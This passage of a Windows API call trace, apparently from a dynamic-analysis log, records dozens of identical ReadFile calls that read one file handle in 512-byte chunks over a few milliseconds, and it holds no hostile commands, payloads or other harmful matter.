lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, 